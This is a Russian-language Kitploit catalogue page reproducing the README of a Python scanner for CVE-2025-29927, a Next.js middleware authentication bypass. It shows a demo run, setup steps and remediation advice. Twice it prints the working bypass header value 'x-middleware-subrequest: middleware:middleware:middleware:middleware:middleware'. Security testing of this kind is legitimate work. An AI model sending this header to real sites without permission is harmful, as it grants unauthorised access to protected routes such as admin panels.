Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927 — 🔐 Умный сканер на Python для CVE-2025-29927 — уязвимость обхода аутентификации в middleware Next.js. Обнаруживает meta refresh, редиректы на основе ключевых слов и многое другое. | Kitploit
Инструменты/GitHubGitHub/sagsooz/cve-2025-29927
Сканеры уязвимостейЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubsagsooz/cve-2025-29927

CVE-2025-29927

🔐 Умный сканер на Python для CVE-2025-29927 — уязвимость обхода аутентификации в middleware Next.js. Обнаруживает meta refresh, редиректы на основе ключевых слов и многое другое.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔍 CVE-2025-29927 - Детектор обхода middleware в Next.js

Этот интеллектуальный сканер на Python помогает выявить уязвимость CVE-2025-29927 в приложениях Next.js — критический обход middleware, позволяющий злоумышленникам пропустить аутентификацию с помощью специально сформированного HTTP-заголовка.

🧠 Инструмент определяет не только HTTP-редиректы, но и механизмы перенаправления на стороне клиента, такие как <meta http-equiv="refresh">, редиректы на основе ключевых слов входа, а также скрытые обходы аутентификации.


🚀 Возможности

  • ✅ Интерактивный ввод (целевой URL и путь)
  • ✅ Умное обнаружение:
    • Заголовков обхода x-middleware-subrequest
    • Редиректов на основе <meta refresh>
    • HTML-контента с ключевыми словами, такими как login, sign in, authentication
  • ✅ Цветной вывод в CLI:
    • 🟩 Зелёный для ответов 2xx
    • 🟨 Жёлтый для 3xx
    • 🟥 Красный для 4xx/5xx
  • ✅ Досрочный выход при успешном обходе
  • ✅ Легко расширяется и настраивается

  • 📸 Демонстрация

    root@kitploit:~
    $ python3 CVE-2025-29927.py
    
    🌐 Введите URL целевого сайта (например, http://localhost:3000): http://vulnerable.local
    📁 Введите защищённый путь (например, /dashboard): /admin
    
    → Тестирование с заголовком: middleware:middleware:middleware:middleware:middleware
       ↳ HTTP-статус: 200
       ↳ Обнаружен редирект: Нет
    
    ✅ УЯЗВИМ! Обход успешен с заголовком:
       x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    🧑‍💻 Как использовать

    1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/sagsooz/CVE-2025-29927.git
    cd CVE-2025-29927
    

    2. Установите зависимости:

    root@kitploit:~
    pip install -r requirements.txt
    

    3. Запустите скрипт:

    root@kitploit:~
    python3 CVE-2025-29927.py
    

    📂 Структура проекта

    root@kitploit:~
    .
    ├── CVE-2025-29927.py   # Основной интерактивный сканер
    ├── requirements.txt            # Зависимости Python
    └── README.md                   # Этот файл
    

    📦 requirements.txt

    root@kitploit:~
    requests
    beautifulsoup4
    colorama
    

    🛡️ Как исправить

    Если ваше приложение затронуто, выполните следующие действия:

    1. Обновите Next.js до версии v15.2.3 или новее (или 14.2.25+ / 13.5.7+)
    2. Укрепите маршрутизацию middleware и не полагайтесь исключительно на middleware для аутентификации.
    3. Удалите заголовок x-middleware-subrequest на граничном сервере (например, Nginx):
    root@kitploit:~
    proxy_set_header x-middleware-subrequest "";
    

    ℹ️ Об уязвимости

    CVE-2025-29927 позволяет злоумышленникам обходить проверки middleware в Next.js путём манипуляции заголовком x-middleware-subrequest с подставными значениями, например:

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    В уязвимых версиях это полностью отключает выполнение middleware, предоставляя прямой доступ к защищённым маршрутам, таким как /dashboard, /admin и т.д.


    📬 Контакты

    Поддерживается: @mrzblackhat
    Свяжитесь со мной в Telegram для предложений, улучшений или доработок.


    🏷 Теги

    next.js CVE-2025-29927 bugbounty обход middleware аутентификация веб-безопасность сканер безопасности на Python этичный хакинг


    📄 Лицензия

    Данный инструмент предоставляется только для образовательных и исследовательских целей. Используйте ответственно.

    Скачать инструмент